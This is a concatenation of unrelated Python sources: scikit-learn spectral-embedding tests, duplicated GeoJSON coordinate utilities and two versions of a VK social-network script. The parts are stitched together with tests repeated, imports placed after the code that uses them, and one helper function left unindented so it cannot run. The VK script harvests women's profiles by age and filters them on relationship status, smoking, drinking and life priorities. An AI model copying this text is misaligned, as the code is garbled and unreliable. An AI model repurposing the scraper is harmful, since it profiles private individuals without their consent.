@pytest.mark.filterwarnings("ignore:the behavior of nmi will "
                            "change in version 0.22")
def test_pipeline_spectral_clustering(seed=36):
    # Test using pipeline to do spectral clustering
    random_state = np.random.RandomState(seed)
    se_rbf = SpectralEmbedding(n_components=n_clusters,
                               affinity="rbf",
                               random_state=random_state)
    se_knn = SpectralEmbedding(n_components=n_clusters,
                               affinity="nearest_neighbors",
                               n_neighbors=5,
                               random_state=random_state)
    for se in [se_rbf, se_knn]:
        km = KMeans(n_clusters=n_clusters, random_state=random_state)
        km.fit(se.fit_transform(S))
        # KMeans on the embedding should recover the true blob labels.
        assert_array_almost_equal(
            normalized_mutual_info_score(
                km.labels_,
                true_labels), 1.0, 2)
def test_spectral_embedding_unknown_eigensolver(seed=36):
    # An unsupported eigen_solver value must raise ValueError at fit time.
    model = SpectralEmbedding(n_components=1, affinity="precomputed",
                              random_state=np.random.RandomState(seed),
                              eigen_solver="<unknown>")
    with pytest.raises(ValueError):
        model.fit(S)
def test_spectral_embedding_unknown_affinity(seed=36):
    # An unsupported affinity value must raise ValueError at fit time.
    model = SpectralEmbedding(n_components=1, affinity="<unknown>",
                              random_state=np.random.RandomState(seed))
    with pytest.raises(ValueError):
        model.fit(S)
def test_connectivity(seed=36):
    # _graph_is_connected must give the same verdict for dense, CSR and CSC
    # representations of the same adjacency matrix.
    disconnected = np.array([[1, 0, 0, 0, 0],
                             [0, 1, 1, 0, 0],
                             [0, 1, 1, 1, 0],
                             [0, 0, 1, 1, 1],
                             [0, 0, 0, 1, 1]])
    connected = np.array([[1, 1, 0, 0, 0],
                          [1, 1, 1, 0, 0],
                          [0, 1, 1, 1, 0],
                          [0, 0, 1, 1, 1],
                          [0, 0, 0, 1, 1]])
    for graph, expected in ((disconnected, False), (connected, True)):
        for convert in ((lambda g: g), sparse.csr_matrix, sparse.csc_matrix):
            assert _graph_is_connected(convert(graph)) == expected
def test_spectral_embedding_deterministic():
    # Two identical calls on the same affinity matrix must agree.
    rng = np.random.RandomState(36)
    sims = rbf_kernel(rng.randn(10, 30))
    first = spectral_embedding(sims)
    second = spectral_embedding(sims)
    assert_array_almost_equal(first, second)
def test_spectral_embedding_unnormalized():
    # Test that spectral_embedding is also processing unnormalized laplacian
    # correctly
    random_state = np.random.RandomState(36)
    data = random_state.randn(10, 30)
    sims = rbf_kernel(data)
    n_components = 8
    embedding_1 = spectral_embedding(sims,
                                     norm_laplacian=False,
                                     n_components=n_components,
                                     drop_first=False)

    # Verify using manual computation with dense eigh
    laplacian, dd = csgraph.laplacian(sims, normed=False,
                                      return_diag=True)
    _, diffusion_map = eigh(laplacian)
    embedding_2 = diffusion_map.T[:n_components]
    # Apply the same sign convention so both embeddings are comparable.
    embedding_2 = _deterministic_vector_sign_flip(embedding_2).T

    assert_array_almost_equal(embedding_1, embedding_2)
def test_spectral_embedding_first_eigen_vector():
    # Test that the first eigenvector of spectral_embedding
    # is constant and that the second is not (for a connected graph)
    random_state = np.random.RandomState(36)
    data = random_state.randn(10, 30)
    sims = rbf_kernel(data)
    n_components = 2

    for seed in range(10):
        embedding = spectral_embedding(sims,
                                       norm_laplacian=False,
                                       n_components=n_components,
                                       drop_first=False,
                                       random_state=seed)

        # First column: (near) constant; second column: non-degenerate.
        assert np.std(embedding[:, 0]) == pytest.approx(0)
        assert np.std(embedding[:, 1]) > 1e-3
# [MRG+1] Better non-regression test for spectral embedding AMG solver issue
# (#16014) -- stray pull-request title from a paste, kept as a comment so the
# module remains importable.
import pytest
import numpy as np
from scipy import sparse
from scipy.sparse import csgraph
from scipy.linalg import eigh
from sklearn.manifold import SpectralEmbedding
from sklearn.manifold._spectral_embedding import _graph_is_connected
from sklearn.manifold._spectral_embedding import _graph_connected_component
from sklearn.manifold import spectral_embedding
from sklearn.metrics.pairwise import rbf_kernel
from sklearn.metrics import normalized_mutual_info_score
from sklearn.neighbors import NearestNeighbors
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
from sklearn.utils.extmath import _deterministic_vector_sign_flip
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_array_equal
# Non centered, sparse centers to check the embedding on a non-trivial
# blob layout (each cluster center touches a different subset of features).
centers = np.array([
    [0.0, 5.0, 0.0, 0.0, 0.0],
    [0.0, 0.0, 4.0, 0.0, 0.0],
    [1.0, 0.0, 0.0, 5.0, 1.0],
])
n_samples = 1000
n_clusters, n_features = centers.shape
# Shared dataset used by most tests below.
S, true_labels = make_blobs(n_samples=n_samples, centers=centers,
                            cluster_std=1., random_state=42)
def _check_with_col_sign_flipping(A, B, tol=0.0):
""" Check array A and B are equal with possible sign flipping on
each columns"""
sign = True
for column_idx in range(A.shape[1]):
sign = sign and ((((A[:, column_idx] -
B[:, column_idx]) ** 2).mean() <= tol ** 2) or
(((A[:, column_idx] +
B[:, column_idx]) ** 2).mean() <= tol ** 2))
if not sign:
return False
return True
def test_sparse_graph_connected_component():
    # Build a sparse affinity made of four disjoint groups and check that
    # _graph_connected_component recovers each group exactly.
    # NOTE(review): assertions depend on the exact rng draw order below.
    rng = np.random.RandomState(42)
    n_samples = 300
    boundaries = [0, 42, 121, 200, n_samples]
    p = rng.permutation(n_samples)
    connections = []
    for start, stop in zip(boundaries[:-1], boundaries[1:]):
        group = p[start:stop]
        # Connect all elements within the group at least once via an
        # arbitrary path that spans the group.
        for i in range(len(group) - 1):
            connections.append((group[i], group[i + 1]))
        # Add some more random connections within the group
        min_idx, max_idx = 0, len(group) - 1
        n_random_connections = 1000
        source = rng.randint(min_idx, max_idx, size=n_random_connections)
        target = rng.randint(min_idx, max_idx, size=n_random_connections)
        connections.extend(zip(group[source], group[target]))

    # Build a symmetric affinity matrix
    row_idx, column_idx = tuple(np.array(connections).T)
    data = rng.uniform(.1, 42, size=len(connections))
    affinity = sparse.coo_matrix((data, (row_idx, column_idx)))
    affinity = 0.5 * (affinity + affinity.T)

    for start, stop in zip(boundaries[:-1], boundaries[1:]):
        component_1 = _graph_connected_component(affinity, p[start])
        component_size = stop - start
        assert component_1.sum() == component_size

        # We should retrieve the same component mask by starting by both ends
        # of the group
        component_2 = _graph_connected_component(affinity, p[stop - 1])
        assert component_2.sum() == component_size
        assert_array_equal(component_1, component_2)
def test_spectral_embedding_two_components(seed=36):
    # Test spectral embedding with two components
    random_state = np.random.RandomState(seed)
    n_sample = 100
    affinity = np.zeros(shape=[n_sample * 2, n_sample * 2])
    # first component
    affinity[0:n_sample,
             0:n_sample] = np.abs(random_state.randn(n_sample, n_sample)) + 2
    # second component
    affinity[n_sample::,
             n_sample::] = np.abs(random_state.randn(n_sample, n_sample)) + 2

    # Test of internal _graph_connected_component before connection
    component = _graph_connected_component(affinity, 0)
    assert component[:n_sample].all()
    assert not component[n_sample:].any()
    component = _graph_connected_component(affinity, -1)
    assert not component[:n_sample].any()
    assert component[n_sample:].all()

    # connection: add a single symmetric edge between the two blocks
    affinity[0, n_sample + 1] = 1
    affinity[n_sample + 1, 0] = 1
    # Zero the diagonal, then re-symmetrize.
    affinity.flat[::2 * n_sample + 1] = 0
    affinity = 0.5 * (affinity + affinity.T)

    true_label = np.zeros(shape=2 * n_sample)
    true_label[0:n_sample] = 1

    se_precomp = SpectralEmbedding(n_components=1, affinity="precomputed",
                                   random_state=np.random.RandomState(seed))
    embedded_coordinate = se_precomp.fit_transform(affinity)
    # Some numpy versions are touchy with types
    embedded_coordinate = \
        se_precomp.fit_transform(affinity.astype(np.float32))
    # thresholding on the first components using 0.
    label_ = np.array(embedded_coordinate.ravel() < 0, dtype="float")
    assert normalized_mutual_info_score(true_label, label_) == 1.0
@pytest.mark.parametrize("X", [S, sparse.csr_matrix(S)],
                         ids=["dense", "sparse"])
def test_spectral_embedding_precomputed_affinity(X, seed=36):
    # Feeding the precomputed RBF kernel must reproduce the affinity="rbf"
    # embedding, modulo per-column sign flips.
    gamma = 1.0
    precomp_model = SpectralEmbedding(n_components=2, affinity="precomputed",
                                      random_state=np.random.RandomState(seed))
    rbf_model = SpectralEmbedding(n_components=2, affinity="rbf",
                                  gamma=gamma,
                                  random_state=np.random.RandomState(seed))
    precomp_embedding = precomp_model.fit_transform(rbf_kernel(X, gamma=gamma))
    rbf_embedding = rbf_model.fit_transform(X)
    assert_array_almost_equal(
        precomp_model.affinity_matrix_, rbf_model.affinity_matrix_)
    assert _check_with_col_sign_flipping(precomp_embedding, rbf_embedding,
                                         0.05)
def test_precomputed_nearest_neighbors_filtering():
    # Extra neighbors in a precomputed connectivity graph must be filtered
    # down to n_neighbors, leaving the embedding unchanged.
    n_neighbors = 2
    embeddings = []
    for surplus in [0, 10]:
        knn = NearestNeighbors(n_neighbors=n_neighbors + surplus).fit(S)
        graph = knn.kneighbors_graph(S, mode='connectivity')
        model = SpectralEmbedding(random_state=0, n_components=2,
                                  affinity='precomputed_nearest_neighbors',
                                  n_neighbors=n_neighbors)
        embeddings.append(model.fit(graph).embedding_)
    assert_array_equal(embeddings[0], embeddings[1])
@pytest.mark.parametrize("X", [S, sparse.csr_matrix(S)],
                         ids=["dense", "sparse"])
def test_spectral_embedding_callable_affinity(X, seed=36):
    # Test spectral embedding with callable affinity
    gamma = 0.9
    kern = rbf_kernel(S, gamma=gamma)
    se_callable = SpectralEmbedding(n_components=2,
                                    affinity=(
                                        lambda x: rbf_kernel(x, gamma=gamma)),
                                    gamma=gamma,
                                    random_state=np.random.RandomState(seed))
    se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
                               gamma=gamma,
                               random_state=np.random.RandomState(seed))
    embed_rbf = se_rbf.fit_transform(X)
    embed_callable = se_callable.fit_transform(X)
    # The callable and built-in affinities must produce the same kernel and
    # (up to sign flips) the same embedding.
    assert_array_almost_equal(
        se_callable.affinity_matrix_, se_rbf.affinity_matrix_)
    assert_array_almost_equal(kern, se_rbf.affinity_matrix_)
    assert _check_with_col_sign_flipping(embed_rbf, embed_callable, 0.05)
# TODO: Remove once pyamg replaces its scipy.rand call with np.random.rand
# https://github.com/scikit-learn/scikit-learn/issues/15913
@pytest.mark.filterwarnings(
    "ignore:scipy.rand is deprecated:DeprecationWarning:pyamg.*")
def test_spectral_embedding_amg_solver(seed=36):
    # The AMG eigensolver must agree with ARPACK up to per-column sign.
    pytest.importorskip('pyamg')
    common = dict(n_components=2, affinity="nearest_neighbors", n_neighbors=5)
    se_amg = SpectralEmbedding(eigen_solver="amg",
                               random_state=np.random.RandomState(seed),
                               **common)
    se_arpack = SpectralEmbedding(eigen_solver="arpack",
                                  random_state=np.random.RandomState(seed),
                                  **common)
    assert _check_with_col_sign_flipping(
        se_amg.fit_transform(S), se_arpack.fit_transform(S), 1e-5)

    # Special case in which AMG is not actually used (regression test for
    # #10715): a tiny graph with an explicitly precomputed affinity.
    row = [0, 0, 1, 2, 3, 3, 4]
    col = [1, 2, 2, 3, 4, 5, 5]
    val = [100, 100, 100, 1, 100, 100, 100]
    affinity = sparse.coo_matrix((val + val, (row + col, col + row)),
                                 shape=(6, 6)).toarray()
    se_amg.affinity = "precomputed"
    se_arpack.affinity = "precomputed"
    assert _check_with_col_sign_flipping(
        se_amg.fit_transform(affinity), se_arpack.fit_transform(affinity),
        1e-5)
# TODO: Remove the filterwarnings once pyamg replaces its scipy.rand call
# with np.random.rand:
# https://github.com/scikit-learn/scikit-learn/issues/15913
@pytest.mark.filterwarnings(
    "ignore:scipy.rand is deprecated:DeprecationWarning:pyamg.*")
def test_spectral_embedding_amg_solver_failure():
    # Non-regression test for an AMG solver failure (issue #13393 on github).
    pytest.importorskip('pyamg')
    seed = 36
    num_nodes = 100
    rand_graph = sparse.rand(num_nodes, num_nodes, density=0.1,
                             random_state=seed)
    upper = sparse.triu(rand_graph) - sparse.diags(rand_graph.diagonal())
    sym_matrix = upper + upper.T
    reference = spectral_embedding(sym_matrix, n_components=10,
                                   eigen_solver='amg', random_state=0)
    # The learned embedding must be stable w.r.t. the solver's random init.
    for trial in range(3):
        candidate = spectral_embedding(sym_matrix, n_components=10,
                                       eigen_solver='amg',
                                       random_state=trial + 1)
        assert _check_with_col_sign_flipping(reference, candidate, tol=0.05)
@pytest.mark.filterwarnings("ignore:the behavior of nmi will "
                            "change in version 0.22")
def test_pipeline_spectral_clustering(seed=36):
    # KMeans on top of a spectral embedding must recover the true labels.
    rng = np.random.RandomState(seed)
    embedders = [
        SpectralEmbedding(n_components=n_clusters, affinity="rbf",
                          random_state=rng),
        SpectralEmbedding(n_components=n_clusters,
                          affinity="nearest_neighbors", n_neighbors=5,
                          random_state=rng),
    ]
    for embedder in embedders:
        km = KMeans(n_clusters=n_clusters, random_state=rng)
        km.fit(embedder.fit_transform(S))
        assert_array_almost_equal(
            normalized_mutual_info_score(km.labels_, true_labels), 1.0, 2)
def test_spectral_embedding_unknown_eigensolver(seed=36):
    # An unrecognised eigen_solver must raise ValueError at fit time.
    estimator = SpectralEmbedding(n_components=1, affinity="precomputed",
                                  random_state=np.random.RandomState(seed),
                                  eigen_solver="<unknown>")
    with pytest.raises(ValueError):
        estimator.fit(S)
def test_spectral_embedding_unknown_affinity(seed=36):
    # An unrecognised affinity string must raise ValueError at fit time.
    estimator = SpectralEmbedding(n_components=1, affinity="<unknown>",
                                  random_state=np.random.RandomState(seed))
    with pytest.raises(ValueError):
        estimator.fit(S)
def test_connectivity(seed=36):
    # _graph_is_connected must give the same verdict for dense, CSR and CSC
    # representations of both a disconnected and a connected graph.
    disconnected = np.array([[1, 0, 0, 0, 0],
                             [0, 1, 1, 0, 0],
                             [0, 1, 1, 1, 0],
                             [0, 0, 1, 1, 1],
                             [0, 0, 0, 1, 1]])
    connected = np.array([[1, 1, 0, 0, 0],
                          [1, 1, 1, 0, 0],
                          [0, 1, 1, 1, 0],
                          [0, 0, 1, 1, 1],
                          [0, 0, 0, 1, 1]])
    for convert in (lambda g: g, sparse.csr_matrix, sparse.csc_matrix):
        assert not _graph_is_connected(convert(disconnected))
        assert _graph_is_connected(convert(connected))
def test_spectral_embedding_deterministic():
    # Two runs on the same affinity matrix must yield identical embeddings.
    rng = np.random.RandomState(36)
    sims = rbf_kernel(rng.randn(10, 30))
    assert_array_almost_equal(spectral_embedding(sims),
                              spectral_embedding(sims))
def test_spectral_embedding_unnormalized():
    # spectral_embedding with norm_laplacian=False must match a manual
    # dense eigendecomposition of the unnormalised graph Laplacian.
    rng = np.random.RandomState(36)
    sims = rbf_kernel(rng.randn(10, 30))
    n_components = 8
    embedding_fast = spectral_embedding(sims, norm_laplacian=False,
                                        n_components=n_components,
                                        drop_first=False)
    laplacian, dd = csgraph.laplacian(sims, normed=False, return_diag=True)
    _, diffusion_map = eigh(laplacian)
    embedding_dense = diffusion_map.T[:n_components]
    embedding_dense = _deterministic_vector_sign_flip(embedding_dense).T
    assert_array_almost_equal(embedding_fast, embedding_dense)
def test_spectral_embedding_first_eigen_vector():
    # For a connected graph the first eigenvector is constant while the
    # second one is not, whatever the solver's random initialisation.
    rng = np.random.RandomState(36)
    sims = rbf_kernel(rng.randn(10, 30))
    n_components = 2
    for solver_seed in range(10):
        embedding = spectral_embedding(sims, norm_laplacian=False,
                                       n_components=n_components,
                                       drop_first=False,
                                       random_state=solver_seed)
        assert np.std(embedding[:, 0]) == pytest.approx(0)
        assert np.std(embedding[:, 1]) > 1e-3
|
import vk_api

# Cheat-sheet of users.search field values used by the filters below
# (author's own observations of the VK API; not verified against docs):
# birth_month
# religion interests about
# fields last_seen movies music online
# personal -
#   people_main: keep 1 2 5, maybe 6; drop 3 4
#   life_main: keep 4 5 6; drop 1 2 3 7 8
#   smoking: keep 1 2; drop 3 4 5
#   alcohol: keep 1 2; drop 3 4 5
#   relation: keep 0 1 6; drop 2-5 7 8
# city=121 rybinsk
# country=1
# sex=1 (1=W 2=M)
# status: drop 2 3 4 5 7 8

# Credentials: password is kept in a local file so it is not hard-coded here.
password = open('/home/ksi/password').read().strip()
vk_session = vk_api.VkApi('ksilenomen@gmail.com', password)
vk_session.auth()
vk = vk_session.get_api()  # authenticated API client used by all helpers below
age = 25  # module default; the functions below take age as a parameter instead
def vk_get_users(age, sex=1):
    """Collect users.search results for one exact age, one birth month at a
    time (count=1000 per request), and return the raw list of user dicts."""
    city = 121  # rybinsk
    found = []
    total = 0
    for month in range(1, 13):
        page = vk.users.search(
            count=1000, city=city, sex=sex, birth_month=month,
            age_from=age, age_to=age,
            fields='about, books, interests, personal, relation')
        print('count: ', page['count'])
        total += page['count']
        found.extend(page['items'])
    print('a count: ', total)
    return found
def vk_filter_(users):
    """Filter raw search results down to promising profiles.

    Keeps users who filled in their 'personal' block, are single
    (relation 0, 1 or 6), whose smoking/alcohol answers are 1 or 2, and
    whose people_main is in {1, 2, 5, 6} and life_main in {4, 5, 6}.
    Unanswered smoking/alcohol/people_main/life_main fields fall back to an
    accepting default, matching the original heuristics.

    :param users: list of user dicts as returned by vk.users.search
    :return: new list with only the users passing every check
    """
    filtered = []
    for user in users:
        personal = user.get('personal')
        if not personal:
            continue
        relation = user.get('relation')
        # NOTE(fix): the previous truthiness check (`if not user.get(...)`)
        # rejected relation == 0 even though 0 is listed as acceptable below.
        if relation is None:
            continue
        # Only unattached users.
        if relation not in [0, 1, 6]:
            continue
        if personal.get('smoking', 1) not in [1, 2]:
            continue
        if personal.get('alcohol', 1) not in [1, 2]:
            continue
        if personal.get('people_main', 1) not in [1, 2, 5, 6]:
            continue
        if personal.get('life_main', 4) not in [4, 5, 6]:
            continue
        filtered.append(user)
    return filtered
def vk_users_agefromto(f, t):
    """Gather users for every exact age in the inclusive range [f, t]."""
    collected = []
    for current_age in range(f, t + 1):
        collected.extend(vk_get_users(current_age))
    return collected
def vk_print_user(user):
    """Print a profile link followed by the user's free-text fields."""
    print('http://vk.com/id{} {} {}'.format(
        user['id'], user['first_name'], user['last_name']))
    print(" {} {} {}".format(
        user.get('interests'), user.get('books'), user.get('about')))
# Driver: fetch ages 25-29, filter, then print every remaining profile.
users = vk_users_agefromto(25, 29)
#users = vk_get_users(25)
print('all: ', len(users))
users = vk_filter_(users)
print(len(users))
#vk_print_user(users[0])
for u in users:
    vk_print_user(u)
# vk_search: second revision of the VK search script follows
import vk_api
from datetime import datetime

# Cheat-sheet of users.search field values used by the filters below
# (author's own observations of the VK API; not verified against docs):
# birth_month
# religion interests about
# fields last_seen movies music online
# personal -
#   people_main: keep 1 2 5, maybe 6; drop 3 4
#   life_main: keep 4 5 6; drop 1 2 3 7 8
#   smoking: keep 1 2; drop 3 4 5
#   alcohol: keep 1 2; drop 3 4 5
#   relation: keep 0 1 6; drop 2-5 7 8
# city=121 rybinsk
# country=1
# sex=1 (1=W 2=M)
# status: drop 2 3 4 5 7 8
# groups - exclude adult/spam communities (original note listed examples in Russian)

# Credentials: password is kept in a local file so it is not hard-coded here.
password = open('/home/ksi/password').read().strip()
vk_session = vk_api.VkApi('ksilenomen@gmail.com', password)
vk_session.auth()
vk = vk_session.get_api()  # authenticated API client used by all helpers below
age = 25  # module default; the functions below take age as a parameter instead
current_year = 2019  # profiles not seen online during this year are dropped
def vk_get_users(age, sex=1):
    """Search one exact age across all birth months (count=1000 per request)
    and return the results already passed through vk_filter_."""
    city = 121  # rybinsk -- only used by the commented-out city-limited query
    found = []
    total = 0
    for month in range(1, 13):
        page = vk.users.search(
            count=1000, sex=sex, birth_month=month,
            age_from=age, age_to=age,
            fields='about, books, interests, personal, relation, last_seen')
        #page = vk.users.search(count=1000, city=city, sex=sex, birth_month=month, age_from=age, age_to=age, fields='about, books, interests, personal, relation, last_seen')
        print('count: ', page['count'])
        total += page['count']
        found.extend(page['items'])
    print('a count: ', total)
    return vk_filter_(found)
def vk_filter_(users):
    """Filter search results: keep single, non-smoking/non-drinking profiles
    with compatible priorities that were seen online during `current_year`.

    Note the stricter defaults here compared to the first revision:
    people_main/life_main default to 0 (reject when unanswered) while
    smoking/alcohol still default to 1 (accept when unanswered).

    :param users: list of user dicts from vk.users.search (with last_seen)
    :return: new list with only the users passing every check
    """
    filtered = []
    for user in users:
        personal = user.get('personal')
        if not personal:
            continue
        relation = user.get('relation')
        # NOTE(fix): a plain truthiness test used to reject relation == 0
        # even though 0 is accepted just below.
        if relation is None:
            continue
        # Only unattached users (6 = "actively searching" excluded here).
        if relation not in [0, 1]:
            continue
        if personal.get('smoking', 1) not in [1, 2]:
            continue
        if personal.get('alcohol', 1) not in [1, 2]:
            continue
        if personal.get('people_main', 0) not in [1, 2, 5, 6]:
            continue
        if personal.get('life_main', 0) not in [4, 5, 6]:
            continue
        # NOTE(fix): last_seen may be absent (e.g. hidden by privacy
        # settings); the old code crashed with AttributeError on None.
        last_seen = user.get('last_seen') or {}
        ts = last_seen.get('time')
        if ts is None:
            continue
        if datetime.utcfromtimestamp(int(ts)).year != current_year:
            continue
        filtered.append(user)
    return filtered
def vk_users_agefromto(f, t):
    """Concatenate vk_get_users results for each age in the range [f, t]."""
    result = []
    for a in range(f, t + 1):
        result += vk_get_users(a)
    return result
def vk_print_user(user, full=False):
    """Print the profile URL; with full=True also dump the free-text fields."""
    print('http://vk.com/id{} {} {}'.format(
        user['id'], user['first_name'], user['last_name']))
    if not full:
        return
    print(" {} {} {} ".format(
        user.get('interests'), user.get('books'), user.get('about')))
# Driver: fetch users aged 27-29 (already filtered inside vk_get_users)
# and print them all.
users = vk_users_agefromto(27, 29)
print('all: ', len(users))
#users = vk_filter_(users)
print(len(users))
for u in users:
    vk_print_user(u)
# NOTE(review): raises IndexError when the list is empty -- confirm intended.
vk_print_user(users[0], True)
|
"""Coordinate utility functions."""
def coords(obj):
    """
    Yields the coordinates from a Feature or Geometry.

    :param obj: A geometry or feature to extract the coordinates from.
    :type obj: Feature, Geometry
    :return: A generator with coordinate tuples from the geometry or feature.
    :rtype: generator
    """
    if isinstance(obj, (tuple, list)):
        nodes = obj
    elif 'geometry' in obj:
        nodes = obj['geometry']['coordinates']
    else:
        nodes = obj.get('coordinates', obj)
    for node in nodes:
        if isinstance(node, (float, int)):
            # `nodes` is itself a single position: emit it once and stop.
            yield tuple(nodes)
            break
        # Otherwise recurse into the nested coordinate structure.
        for position in coords(node):
            yield position
def map_coords(func, obj):
    """
    Returns the coordinates from a Geometry after applying the provided
    function to every coordinate value.

    :param func: Function applied to each coordinate value.
    :param obj: A geometry to transform.
    :type obj: Point, LineString, MultiPoint, MultiLineString, Polygon,
    MultiPolygon
    :return: A geometry dict of the same type with transformed coordinates.
    :rtype: dict
    :raises ValueError: if the provided object is not a Geometry.
    """
    def xform(position):
        return tuple(map(func, position))

    geom_type = obj['type']
    if geom_type == 'Point':
        new_coords = xform(obj['coordinates'])
    elif geom_type in ('LineString', 'MultiPoint'):
        new_coords = [xform(p) for p in obj['coordinates']]
    elif geom_type in ('MultiLineString', 'Polygon'):
        new_coords = [[xform(p) for p in ring]
                      for ring in obj['coordinates']]
    elif geom_type == 'MultiPolygon':
        new_coords = [[[xform(p) for p in ring] for ring in poly]
                      for poly in obj['coordinates']]
    else:
        raise ValueError("Invalid geometry object %s" % repr(obj))
    return {'type': geom_type, 'coordinates': new_coords}
def generate_random(featureType, numberFeatures=1,
                    numberVertices=3, boundingBox=[-180.0, -90.0, 180.0, 90.0]):
    """
    Generates random geojson features depending on the parameters
    passed through.

    :param featureType: A geometry type
    :type string: Point, LineString, Polygon
    :param numberFeatures: The number of features that will be returned
    :type int: defaults to 1
    :param numberVertices: The number of vertices a LineString or Polygon has
    :type int: defaults to 3
    :param boundingBox: A bounding box [lonMin, latMin, lonMax, latMax] in
    which Point/LineString features will be restricted
    :type list: defaults to the world - [-180.0, -90.0, 180.0, 90.0]
    :return: The resulting random geojson object or geometry collection.
    :rtype: object
    """
    from geojson import Point, LineString, Polygon, GeometryCollection
    import random
    import math

    lonMin, latMin, lonMax, latMax = boundingBox

    # FIX: random.randrange() does not accept float bounds (deprecated in
    # Python 3.10, removed in 3.12) and could never yield fractional
    # coordinates; random.uniform() works with any real-valued bounding box.
    def randomLon():
        return random.uniform(lonMin, lonMax)

    def randomLat():
        return random.uniform(latMin, latMax)

    def clip(value, lo, hi):
        # Clamp value into [lo, hi]; a reversed range returns value as-is.
        if lo > hi:
            return value
        return max(lo, min(value, hi))

    def createPoint():
        return Point((randomLon(), randomLat()))

    def createLine():
        return LineString([(randomLon(), randomLat())
                           for _ in range(numberVertices)])

    def createPoly():
        # Irregular star-shaped polygon around a fixed centre.
        # NOTE(review): ignores boundingBox and can emit coordinates far
        # outside it -- pre-existing behaviour, deliberately kept.
        aveRadius = 60
        ctrX = 0.1
        ctrY = 0.2
        irregularity = clip(0.1, 0, 1) * 2 * math.pi / numberVertices
        spikeyness = clip(0.5, 0, 1) * aveRadius
        # Generate n randomised angle steps, then normalise them so the
        # full sweep is exactly 2*pi (the ring closes on itself).
        lower = (2 * math.pi / numberVertices) - irregularity
        upper = (2 * math.pi / numberVertices) + irregularity
        angleSteps = [random.uniform(lower, upper)
                      for _ in range(numberVertices)]
        k = sum(angleSteps) / (2 * math.pi)
        angleSteps = [step / k for step in angleSteps]
        # Walk around the centre emitting one vertex per angle step.
        points = []
        angle = random.uniform(0, 2 * math.pi)
        for step in angleSteps:
            r_i = clip(random.gauss(aveRadius, spikeyness), 0, 2 * aveRadius)
            points.append((int(ctrX + r_i * math.cos(angle)),
                           int(ctrY + r_i * math.sin(angle))))
            angle += step
        points.append(points[0])  # close the ring
        return Polygon([points])

    if numberFeatures > 1:
        group = []
        for _ in range(numberFeatures):
            if featureType == 'Point':
                group.append(createPoint())
            elif featureType == 'LineString':
                group.append(createLine())
            elif featureType == 'Polygon':
                group.append(createPoly())
        return GeometryCollection(group)
    if featureType == 'Point':
        return createPoint()
    if featureType == 'LineString':
        return createLine()
    if featureType == 'Polygon':
        return createPoly()
# Fixed indentation (revision note for the duplicate module below)
"""Coordinate utility functions."""
def coords(obj):
    """
    Yields the coordinates from a Feature or Geometry.

    :param obj: A geometry or feature to extract the coordinates from.
    :type obj: Feature, Geometry
    :return: A generator with coordinate tuples from the geometry or feature.
    :rtype: generator
    """
    if isinstance(obj, (tuple, list)):
        seq = obj
    elif 'geometry' in obj:
        seq = obj['geometry']['coordinates']
    else:
        seq = obj.get('coordinates', obj)
    for item in seq:
        if isinstance(item, (float, int)):
            # A numeric entry means seq is one bare position: emit it once.
            yield tuple(seq)
            break
        else:
            for sub in coords(item):
                yield sub
def map_coords(func, obj):
    """
    Returns the coordinates from a Geometry after applying the provided
    function to every coordinate value.

    :param func: Function applied to each coordinate value.
    :param obj: A geometry to transform.
    :type obj: Point, LineString, MultiPoint, MultiLineString, Polygon,
    MultiPolygon
    :return: A geometry dict of the same type with transformed coordinates.
    :rtype: dict
    :raises ValueError: if the provided object is not a Geometry.
    """
    kind = obj['type']
    if kind == 'Point':
        result = tuple(map(func, obj['coordinates']))
    elif kind in ('LineString', 'MultiPoint'):
        result = [tuple(map(func, pt)) for pt in obj['coordinates']]
    elif kind in ('MultiLineString', 'Polygon'):
        result = [[tuple(map(func, pt)) for pt in line]
                  for line in obj['coordinates']]
    elif kind == 'MultiPolygon':
        result = [[[tuple(map(func, pt)) for pt in line]
                   for line in poly]
                  for poly in obj['coordinates']]
    else:
        raise ValueError("Invalid geometry object %s" % repr(obj))
    return {'type': kind, 'coordinates': result}
def generate_random(featureType, numberFeatures=1,
                    numberVertices=3, boundingBox=[-180.0, -90.0, 180.0, 90.0]):
    """
    Generates random geojson features depending on the parameters
    passed through.

    :param featureType: A geometry type
    :type string: Point, LineString, Polygon
    :param numberFeatures: The number of features that will be returned
    :type int: defaults to 1
    :param numberVertices: The number of vertices a LineString or Polygon has
    :type int: defaults to 3
    :param boundingBox: A bounding box [lonMin, latMin, lonMax, latMax] in
    which Point/LineString features will be restricted
    :type list: defaults to the world - [-180.0, -90.0, 180.0, 90.0]
    :return: The resulting random geojson object or geometry collection.
    :rtype: object
    """
    from geojson import Point, LineString, Polygon, GeometryCollection
    import random
    import math

    lon_lo, lat_lo, lon_hi, lat_hi = boundingBox

    # FIX: random.randrange() rejects float bounds on Python >= 3.12 and
    # never supported fractional limits; random.uniform() handles any
    # real-valued bounding box.
    def random_lon():
        return random.uniform(lon_lo, lon_hi)

    def random_lat():
        return random.uniform(lat_lo, lat_hi)

    def clamp(v, lo, hi):
        # Clamp v to [lo, hi]; a reversed range leaves v untouched.
        if lo > hi:
            return v
        return max(lo, min(v, hi))

    def make_point():
        return Point((random_lon(), random_lat()))

    def make_line():
        return LineString([(random_lon(), random_lat())
                           for _ in range(numberVertices)])

    def make_poly():
        # Star-shaped polygon with randomised radii and angle steps.
        # NOTE(review): ignores boundingBox (pre-existing behaviour, kept).
        ave_radius = 60
        ctr_x, ctr_y = 0.1, 0.2
        irregularity = clamp(0.1, 0, 1) * 2 * math.pi / numberVertices
        spikeyness = clamp(0.5, 0, 1) * ave_radius
        lo = (2 * math.pi / numberVertices) - irregularity
        hi = (2 * math.pi / numberVertices) + irregularity
        steps = [random.uniform(lo, hi) for _ in range(numberVertices)]
        # Normalise so the angle steps sum to a full revolution.
        scale = sum(steps) / (2 * math.pi)
        steps = [s / scale for s in steps]
        verts = []
        theta = random.uniform(0, 2 * math.pi)
        for step in steps:
            radius = clamp(random.gauss(ave_radius, spikeyness),
                           0, 2 * ave_radius)
            verts.append((int(ctr_x + radius * math.cos(theta)),
                          int(ctr_y + radius * math.sin(theta))))
            theta += step
        verts.append(verts[0])  # close the ring
        return Polygon([verts])

    makers = {'Point': make_point, 'LineString': make_line,
              'Polygon': make_poly}
    maker = makers.get(featureType)
    if numberFeatures > 1:
        group = [maker() for _ in range(numberFeatures)] if maker else []
        return GeometryCollection(group)
    # Unknown featureType falls through to None, as before.
    return maker() if maker else None
|
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
